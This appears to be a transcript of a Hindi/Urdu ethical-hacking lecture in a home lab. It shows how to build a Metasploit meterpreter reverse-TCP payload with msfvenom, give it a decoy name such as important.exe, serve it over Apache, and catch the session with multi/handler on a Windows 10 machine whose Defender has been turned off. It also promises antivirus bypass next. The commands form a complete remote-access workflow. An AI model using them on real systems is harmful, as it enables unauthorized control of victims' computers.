बिस्मिल्लाहिर्रहमानिर्रहीम अस्सलाम वालेकुम। आज का टॉपिक शुरू करने से पहले हम एक क्विक रिकैप देख लेते हैं, जिसमें हमने पढ़ा था। सबसे पहले हमने इंट्रोडक्शन पढ़ा था और इंट्रोडक्शन के बाद हमारा जो टॉपिक था विच वाज फुटप्रिंटिंग एंड रिकॉनेसेंस। रिकॉनेसेंस में हमने हु इज़ लुकअप देखा था। उसके बाद यूज़र रिकॉन एक टूल था, लाइनक्स बेस्ड, काली लाइनक्स पे हमने इंस्टॉल किया था। उसके बाद हमने स्पाइडर फुट यूज़ किया था, जो कि डोमेन फुटप्रिंटिंग का टूल था और ईमेल एड्रेस फुटप्रिंटिंग का टूल था। उसके बाद हमने इग्नोरेंट पढ़ा था और इग्नोरेंट यूज़ करते हुए हमने सोशल मीडिया अकाउंट्स ढूंढे थे, फाइंड किए थे, जो कि किसी एक फ़ोन नंबर के साथ लिंक हो। और उसके बाद फिर अगला टॉपिक हमारा स्कैनिंग था। स्कैनिंग में हमने एनमैप पढ़ा था। एनमैप की कुछ बेसिक्स देखी थी, कुछ कमांड्स देखी थी, जिसमें एग्रेसिव स्कैन था, वर्जन स्कैन था, ओएस स्कैन था। तो ओके जी, मूविंग फॉरवर्ड हम आज का अपना लेक्चर स्टार्ट करते हैं, विच इज़ गेनिंग एक्सेस। ये हमारा जो टॉपिक होगा, ये भी इसमें हम कुछ टूल्स का इस्तेमाल करते हुए एक अनऑथराइज्ड एक्सेस हम हासिल करेंगे किसी एक कंप्यूटर की। और ज़्यादातर ये प्रैक्टिकल बेस्ड होगा और इसका थ्योरी इतनी ज़्यादा नहीं होगी। इसमें हम जो यूज़ करेंगे टूल, मेटास्प्लॉइट यूज़ करेंगे और इसके साथ हम विंडोज़ 10 की मशीन यूज़ करेंगे। ठीक है, इसको थोड़ा सा पढ़ लेते हैं कि दिस फेज ऑफ हैकिंग इज़ द पॉइंट वेयर द हैकर्स गेन कंट्रोल ओवर एन ऑपरेटिंग सिस्टम, एप्लीकेशन और कंप्यूटर नेटवर्क। ये वो फेज़ है हैकिंग का जिसमें एक हैकर जो होता है वो एक ऑपरेटिंग सिस्टम पर, किसी एप्लीकेशन पर या किसी कंप्यूटर नेटवर्क पर कंट्रोल हासिल कर लेता है। The control gained by the attacker defines the access level, whether the operating system level, application level, or network level. Techniques include password cracking, denial of service, session hijacking, buffer overflow, or other techniques used to gaining unauthorized access. After accessing the system, the attacker escalates the privileges to a point to obtain complete control over services and processes and compromise the connected intermediate system. गेनिंग एक्सेस में हम ये सारे टॉपिक्स को कवर करेंगे, जिसमें पासवर्ड क्रैकिंग भी देखेंगे, डीडॉस अटैक्स भी देखेंगे, सेशन हाईजैकिंग भी देखेंगे, बफर ओवरफ्लो भी देखेंगे और कुछ और टेक्निक्स भी यूज़ करेंगे। तो चलते हैं अपनी लैब की तरफ और स्टार्ट करते हैं जी। लैब पे आ गए हम और अपनी ऑपरेटिंग सिस्टम को लॉगिन कर लेते हैं और अपनी विंडोज़ ऑपरेटिंग सिस्टम को भी लॉगिन कर लेते हैं। ओके फाइन, टर्मिनल ओपन करते हैं। दो टर्मिनल ओपन करते हैं। दो क्यों करने हैं वो मैं आपको बताता हूँ साथ साथ। ओके, फर्स्ट पे हम क्या करते हैं, पहले सुपर यूज़र से लॉगिन कर लेते हैं और अपना MSF कंसोल ओपन करते हैं, एंटर कर देते हैं। MSF कंसोल ओपन हो गया जी। ये जो आप देख रहे हैं MSF6, इसका ये मतलब है कि हमने एक मॉड्यूल ओपन कर लिया MSF कंसोल का। और हम सबसे पहली कमांड देंगे MSF venom -हाइफन हेल्प। हेल्प देखते हैं कि हेल्प में ये हमें क्या बताता है। -L, L फॉर लिस्ट है, -P फॉर पेलोड्स है, एंड सो ऑन। हमारा जो इसमें ज़्यादातर यूज़ होगा वो -P होगा। हमने एक पेलोड क्रिएट करना होगा और फिर उसको आगे विक्टिम तक पहुंचाना होगा। तो हम सबसे पहले क्या करते हैं, MSF venom -लिस्ट
पेलोड्स। ये हमें लिस्ट बता देगा पेलोड्स की, और फिर उसमें से हम एक पेलोड अपना सिलेक्ट करेंगे और उसको यूज़ करेंगे। ये हमारा पेलोड होगा जिसको हम यूज़ करेंगे। आगे बढ़ते हैं। आगे हम एक कमांड देंगे msf venom -p पेलोड विंडोज x64 मीटरप्रेटर रिवर्स टीसीपी और उसके साथ हम देंगे लोकल होस्ट जो कि मेरी काली लाइनक्स का आईपी होगा, एल होस्ट इक्वल्स टू 192.168.159.130 और उसके साथ हम एल पोर्ट देंगे विच विल बी 4444। हम कोई सी एक रैंडम पोर्ट भी यूज़ कर सकते हैं। इन माय केस मैं 4444 यूज़ करूँगा। और उसके साथ हम -f देंगे, फाइल टाइप exe, -o का यूज़ करते हुए home/kali/desktop/important.exe। आप फाइल नेम कोई भी दे सकते हैं, update.exe, important.exe, कोई भी आप अपनी मर्जी से दे सकते हैं। और ये एक फाइल important.exe की इसने मुझे बनाकर दे दी है। ये एक पेलोड है। अब अगला काम हमारा क्या है कि ये पेलोड हमने अपने विंडोज़ 10 मशीन पर पहुंचाना है। हम दूसरे टर्मिनल में जाते हैं और सुपर यूज़र से लॉगिन करते हैं और एक सर्विस हम स्टार्ट करते हैं, सर्विस अपाची 2 स्टार्ट। ये क्या करेगी कि एक अपाची का सर्वर जो है उसकी सर्विस चला देगी। विंडोज़ 10 पे बैठकर हम इस फाइल को एक्सेस करेंगे। चेक करते हैं सर्विस हमारी स्टार्ट हुई है या नहीं हुई। हम ब्राउज़र ओपन करेंगे। यहाँ पर हम अपने काली लाइनक्स का आईपी डालेंगे। अब अगला हमारा काम क्या होगा कि हमने इस फाइल को कॉपी करना है www और HTML के फोल्डर में हमने इसको कॉपी करना है। तो कॉपी करते हैं इसको। कॉपी करने का तरीका ये है कि हम डेस्कटॉप पे आ जाएंगे, ls करते हैं और cd डेस्कटॉप पे चले जाते हैं, ls करते हैं। ये हमारी फाइल पड़ी हुई है। हम इसको कॉपी करते हैं cp important.exe और इसको हमने करना है var/www/html/shared। एंटर करते हैं। शेयर्ड की जो डायरेक्टरी है ये मैंने खुद क्रिएट की थी ताकि हमारे जो पेलोड है हम इसको वहाँ पे कॉपी करें और इसी फोल्डर को एक्सेस करें हम विंडोज़ 10 से। विंडोज़ 10 पे आते हैं। विंडोज़ 10 पे आते हुए सबसे पहले आपने क्या करना है, डिफेंडर की सेटिंग्स जो है उसको बंद करना है। कोई भी एंटीवायरस है उसको बंद करना होगा। ओके, चेक कर लेते हैं ये बंद है हमारी प्रोटेक्शन और ये सारी प्रोटेक्शंस जो है ये सारी ऑफ है। क्लोज कर देते हैं इसे और ब्राउज़र ओपन करते हैं। यहाँ पर हम अपना आईपी डालते हैं काली लाइनक्स का 192.168
159.130 और ये 7 शेयर्ड की डायरेक्टरी ये मैंने ओपन की है और ये हमारी फाइल पड़ी हुई है important.exe। इसको डाउनलोड करते हैं और कीप करेंगे और इसको कीप एनीवे और फोल्डर में चले जाते हैं। ये हमारी फाइल यहाँ पर आ गई है। अब हम वापस आते हैं अपने MSF पे और कुछ मज़ीद कमांड चलाते हैं। यूज़ एक्सप्लॉइट /multi /हैंडलर जो हमारे विक्टिम पे हमने पेलोड भेजा है तो वहाँ से जो सेशन आएगा ये उसको एक्सेप्ट करेगा और हमें एक्सेस देगा। यूज़ 6 मल्टी हैंडलर पे जाना हमने यूज़ 6। इसके बाद हम करते हैं शो ऑप्शंस। वो कह रहा है जी लोकल होस्ट और लोकल पोर्ट ये दोनों रिक्वायर्ड हैं। तो हम करते हैं पहले लोकल होस्ट का आईपी दे देते हैं सेट एल होस्ट 192.168.159.130 एंटर करते हैं। शो ऑप्शंस करते हैं। लोकल होस्ट सेट हो चुका है हमारा, लोकल पोर्ट सेट हो चुकी है। सेट पेलोड विंडोज /x64/meterpreter/reverse TCP एंटर करते हैं और एक्सप्लॉइट कर देते हैं। अब हम अपनी विंडोज पे आते हैं और जो exe फाइल थी उसको रन करते हैं। ये हमसे कुछ प्रॉम्प्ट्स मांगेगा, इसको रन एनीवे कर देना है। ये लें जी मीटरप्रेटेड सेशन 1 ओपन एट 192.168.159.130 और कहाँ से ये सेशन आया है 192.168.159.128 128 विंडोज 10 की मशीन का आईपी है। मैं आपको यहाँ से चेक करवा देता हूँ। ये यू कैन सी कि ये हमारा विंडोज 10 का आईपी है। यहाँ से ये सेशन ओपन हुआ है। अब हम चेक करते हैं कि हम किस डायरेक्टरी पर बैठे हुए हैं। PWD करते हैं। वो कह रहा है आप सी यूजर्स विंडोज 10 डाउनलोड्स में बैठे हुए हैं। डाउनलोड्स में हम LS करते हैं और आप देख सकते हैं कि डेस्कटॉप में डाउनलोड्स में मेरे पास important.exe की फाइल पड़ी हुई है, विंडरार की एक फाइल पड़ी हुई है, desktop.ini की फाइल पड़ी हुई है। मैं विंडोज 10 पे भी आपको चेक करवा देता हूँ। डाउनलोड्स में इंपॉर्टेंट की फाइल पड़ी है और विंडरार x64 की पड़ी हुई है। यहाँ पर एक डायरेक्टरी बनाते हैं चेक करने के लिए, टेस्ट LS करते हैं। यू कैन सी कि टेस्ट के एक डायरेक्टरी बन चुकी है। हम यहाँ पर एक फाइल बनाते हैं, टेक्स्ट डॉक्यूमेंट बना लेते हैं, टेस्ट डॉक्यूमेंट एंटर करते हैं और LS करते हैं। ये लें जी, ये आप देख सकते हैं टेस्ट डॉक्यूमेंट .txt। तो इस तरह से करके हमने एक एक्सप्लॉइट यूज़ करते हुए हमने एक विंडोज़ 10 की मशीन को कॉम्प्रोमाइज़ किया। आने वाले लेक्चर्स में हम मज़ीद कुछ एडवांस टेक्निक्स भी देखेंगे कि जिसमें हमें विंडोज़ डिफेंडर की जो फायरवॉल है या विंडोज़ डिफेंडर या कोई भी एंटीवायरस है उसको हमने बाईपास कैसे करना है।
तो आने वाले लेक्चर में हम इंशाल्लाह ये पढ़ेंगे। और आप सबसे गुजारिश है कि आप मेरा चैनल सब्सक्राइब कर दें ताकि आपको नई अपडेट्स जो हैं वो मिलती रहें। अगले लेक्चर में मिलते हैं इंशाल्लाह। अल्लाह हाफिज़।